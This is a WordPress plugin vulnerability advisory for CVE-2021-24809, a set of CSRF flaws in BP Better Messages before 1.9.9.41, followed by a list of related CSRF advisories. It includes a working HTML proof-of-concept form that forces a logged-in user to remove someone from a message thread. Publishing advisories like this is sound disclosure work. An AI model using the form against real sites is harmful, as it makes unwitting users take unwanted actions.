BP Better Messages < 1.9.9.41 – Multiple CSRF | CVE 2021-24809 | Plugin Vulnerabilities

Description

The plugin does not check for CSRF in multiple of its AJAX actions: bp_better_messages_leave_chat, bp_better_messages_join_chat, bp_messages_leave_thread, bp_messages_mute_thread, bp_messages_unmute_thread, bp_better_messages_add_user_to_thread, bp_better_messages_exclude_user_from_thread. This could allow attackers to make logged in users do unwanted actions

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="bp&#95;better&#95;messages&#95;exclude&#95;user&#95;from&#95;thread" />
      <input type="hidden" name="user&#95;id" value="4" />
      <input type="hidden" name="thread&#95;id" value="3" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

bp-better-messages

Fixed in 1.9.9.41

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2605772/bp-better-messages/trunk/inc/ajax.php

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter

Verified

Yes

WPVDB ID

e186fef4-dca0-461f-b539-082c13a68d13

Timeline

Publicly Published

2021-10-04 (about 4 years ago)

Added

2021-10-04 (about 4 years ago)

Last Updated

2022-04-15 (about 3 years ago)

Other

Published

Title

Published

2025-09-22

Title

payOS <= 1.0.61 - Cross-Site Request Forgery

Published

2025-02-13

Title

Easy Amazon Product Information <= 4.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2022-08-04

Title

Ecwid Ecommerce Shopping Cart < 6.10.24 - Settings Update via CSRF

Published

2025-04-04

Title

Libro de Reclamaciones y Quejas <= 1.0 - Stored XSS via CSRF

Published

2025-10-02

Title

Mobile Site Redirect <= 1.2.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting